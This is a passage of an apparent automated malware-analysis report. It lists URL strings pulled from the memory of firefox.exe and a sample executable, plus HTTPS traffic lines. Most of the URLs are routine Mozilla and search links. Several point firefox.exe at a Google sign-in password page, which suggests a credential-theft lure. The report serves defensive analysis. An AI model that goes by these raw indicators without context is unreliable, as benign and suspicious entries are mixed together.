                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://snippets.cdn.mozilla.net/%STARTPAGE_VERSION%/%NAME%/%VERSION%/%APPBUILDID%/%BUILD_TARGET%/%L
                      Source: firefox.exe, 00000034.00000002.2033119114.000001F922760000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2028770010.000001F921278000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://spocs.getpocket.com/
                      Source: firefox.exe, 00000034.00000002.2028770010.000001F921278000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2033119114.000001F922724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://spocs.getpocket.com/spocs
                      Source: firefox.exe, 00000034.00000002.2033119114.000001F922760000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2028770010.000001F921278000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://spocs.getpocket.com/user
                      Source: firefox.exe, 00000034.00000002.1993367719.000001F91EE03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://static.adsafeprotected.com/firefox-etp-js
                      Source: firefox.exe, 00000034.00000002.1993367719.000001F91EE03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://static.adsafeprotected.com/firefox-etp-jsC:
                      Source: firefox.exe, 00000034.00000002.1993367719.000001F91EE03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://static.adsafeprotected.com/firefox-etp-pixel
                      Source: firefox.exe, 00000034.00000002.1993367719.000001F91EE03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://static.adsafeprotected.com/firefox-etp-pixelCannot
                      Source: firefox.exe, 00000034.00000002.1997756718.000001F91FC4F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.1991428513.000001F91ED89000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.1993367719.000001F91EE03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cross-site-tracking-report
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cryptominers-report
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/fingerprinters-report
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/firefox-relay-integration
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/password-manager-report
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/search-engine-removal
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/send-tab
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/shield
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/social-media-tracking-report
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/tracking-content-report
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/captive-portal
                      Source: 19be97887a.exe, 0000001E.00000003.1787469607.00000000059B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                      Source: firefox.exe, 00000034.00000002.2033119114.000001F922709000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windows
                      Source: firefox.exe, 00000034.00000002.2023597144.000001F9201E0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windowsThe
                      Source: firefox.exe, 00000034.00000002.2023597144.000001F9201E0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windowsUse
                      Source: 19be97887a.exe, 0000001E.00000003.1787469607.00000000059B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                      Source: firefox.exe, 00000034.00000002.1993367719.000001F91EE03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.orghttps://monitor.firefox.comupgradeTabsProgressListenermaybeShowOnboarding
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://token.services.mozilla.com/1.0/sync/1.5
                      Source: firefox.exe, 00000034.00000002.2033119114.000001F922709000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-2
                      Source: firefox.exe, 00000034.00000002.2033119114.000001F922709000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-3.1
                      Source: firefox.exe, 00000034.00000002.2033119114.000001F922709000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-4
                      Source: firefox.exe, 00000034.00000002.2033119114.000001F922709000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc7515#appendix-C)
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://topsites.services.mozilla.com/cid/
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://tracking-protection-issues.herokuapp.com/new
                      Source: firefox.exe, 00000034.00000002.1997756718.000001F91FC4F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2028770010.000001F9212B8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.1993367719.000001F91EE03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://truecolors.firefox.com
                      Source: firefox.exe, 00000034.00000002.1993367719.000001F91EE03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://truecolors.firefox.com_migrateXULStoreForDocumentshouldCheckDefaultBrowserPRIVILEGEDABOUT_RE
                      Source: firefox.exe, 00000034.00000002.1997756718.000001F91FC6F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2033119114.000001F922760000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2028770010.000001F921278000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://versioncheck-bg.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://versioncheck.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM_ID
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://vpn.mozilla.org/?utm_source=firefox-browser&utm_medium=firefox-%CHANNEL%-browser&utm_campaig
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://vpn.mozilla.org/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_campaign=about-pr
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://webcompat.com/issues/new
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://webextensions.settings.services.mozilla.com/v1
                      Source: 19be97887a.exe, 0000001E.00000003.1788130684.000000000589A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.1997756718.000001F91FC7B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.1997756718.000001F91FC6F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2028770010.000001F921278000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.1985782385.000001F91E4AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15d7e4b694824b33323940336fbf0bead57d89764383fe44
                      Source: firefox.exe, 00000034.00000002.1993367719.000001F91EE7B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000003.1958008473.000001F922A57000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/exec/obidos/external-search/
                      Source: firefox.exe, 00000034.00000002.1993367719.000001F91EE7B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/exec/obidos/external-search/https://www.amazon.com/exec/obidos/external-searc
                      Source: firefox.exe, 00000034.00000002.1993367719.000001F91EE7B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/exec/obidos/external-search/moz-extension://e0809c94-e14e-4649-a902-2a450fccc
                      Source: 19be97887a.exe, 0000001E.00000003.1726455907.00000000058C9000.00000004.00000800.00020000.00000000.sdmp, 19be97887a.exe, 00000023.00000003.1871649664.00000000057C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/v20w
                      Source: firefox.exe, 00000034.00000002.1993367719.000001F91EE7B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000003.1958008473.000001F922A57000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/complete/search?client=firefox&q=
                      Source: 19be97887a.exe, 0000001E.00000003.1726455907.00000000058C9000.00000004.00000800.00020000.00000000.sdmp, 19be97887a.exe, 00000023.00000003.1871649664.00000000057C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
                      Source: firefox.exe, 00000034.00000002.1993367719.000001F91EE03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/policies/privacy/
                      Source: firefox.exe, 00000034.00000002.1993367719.000001F91EE03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/policies/privacy/mozIGeckoMediaPluginChromeService
                      Source: firefox.exe, 00000034.00000002.1993367719.000001F91EE7B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000003.1958008473.000001F922A57000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search
                      Source: firefox.exe, 00000034.00000002.1993367719.000001F91EE7B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/searchadditional_backgrounds_alignmentinternal:privateBrowsingAllowed
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/geolocation/v1/geolocate?key=%GOOGLE_LOCATION_SERVICE_API_KEY%
                      Source: 19be97887a.exe, 0000001E.00000003.1788130684.000000000589A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.1997756718.000001F91FC7B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.1997756718.000001F91FC6F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2028770010.000001F921278000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.1985782385.000001F91E4AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
                      Source: firefox.exe, 00000034.00000002.1997756718.000001F91FC4F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.1962523007.0000006F3483C000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/%LOCALE%/about/legal/terms/subscription-services/
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/%VERSION%/releasenotes/?utm_source=firefox-browser&utm_medi
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/%VERSION%/tour/
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/geolocation/
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/new?reason=manual-update
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/notes
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/set-as-default/thanks/
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/xr/
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/%LOCALE%/privacy/subscription-services/
                      Source: 19be97887a.exe, 0000001E.00000003.1787469607.00000000059B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.0JoCxlq8ibGr
                      Source: 19be97887a.exe, 0000001E.00000003.1787469607.00000000059B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.Tgc_vjLFc3HK
                      Source: 19be97887a.exe, 0000001E.00000003.1787469607.00000000059B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/android/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_c
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/ios/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_campa
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html#crash-reporter
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html#health-report
                      Source: firefox.exe, 00000034.00000002.1985782385.000001F91E443000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/
                      Source: firefox.exe, 00000034.00000002.2028770010.000001F921278000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2033119114.000001F922724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/#suggest-relevant-content
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_c
                      Source: 19be97887a.exe, 0000001E.00000003.1787469607.00000000059B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                      Source: firefox.exe, 00000034.00000002.1962523007.0000006F3483C000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.orgo
                      Source: firefox.exe, 00000034.00000002.1988159515.000001F91E5B1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.1993367719.000001F91EE03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.openh264.org/
                      Source: firefox.exe, 00000034.00000002.1997756718.000001F91FC6F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2033119114.000001F922760000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2028770010.000001F921278000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.reddit.com/
                      Source: firefox.exe, 00000034.00000002.1993367719.000001F91EE03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.widevine.com/
                      Source: firefox.exe, 00000034.00000002.1993367719.000001F91EE03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.widevine.com/setupInstallLocations/locations
                      Source: firefox.exe, 00000034.00000002.2028770010.000001F921278000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
                      Source: firefox.exe, 00000034.00000002.2033119114.000001F922709000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://xhr.spec.whatwg.org/#sync-warning
                      Source: firefox.exe, 00000034.00000002.2023597144.000001F9201E0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://xhr.spec.whatwg.org/#sync-warningThe
                      Source: firefox.exe, 00000034.00000002.1983640551.000001F91497A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://youtube.com/acc
                      Source: firefox.exe, 00000034.00000002.1993367719.000001F91EE24000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.1978497681.000001F912A80000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.1993367719.000001F91EE7B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.1985782385.000001F91E4AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.1978786158.000001F912AE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd
                      Source: firefox.exe, 00000031.00000002.1900578768.000001BE4B36A000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000032.00000002.1948982402.000001E00814F000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.1978786158.000001F912AE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd--no-default-browser
                      Source: firefox.exe, 00000034.00000002.1978786158.000001F912AE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd.
                      Source: firefox.exe, 00000034.00000002.1983640551.000001F91497A000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.1983640551.000001F9149A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdMOZ_CRASHREPORTER_RE
                      Source: firefox.exe, 00000034.00000002.1993367719.000001F91EE7B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdTrue
                      Source: firefox.exe, 00000034.00000002.1978786158.000001F912AE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwda
                      Source: firefox.exe, 00000034.00000002.1980859392.000001F912D03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdb
                      Source: firefox.exe, 00000034.00000002.1993367719.000001F91EE7B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdmoz-extension://89c8
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49695 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49698
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49695
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49681 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49681
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49673
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49676 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49671 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
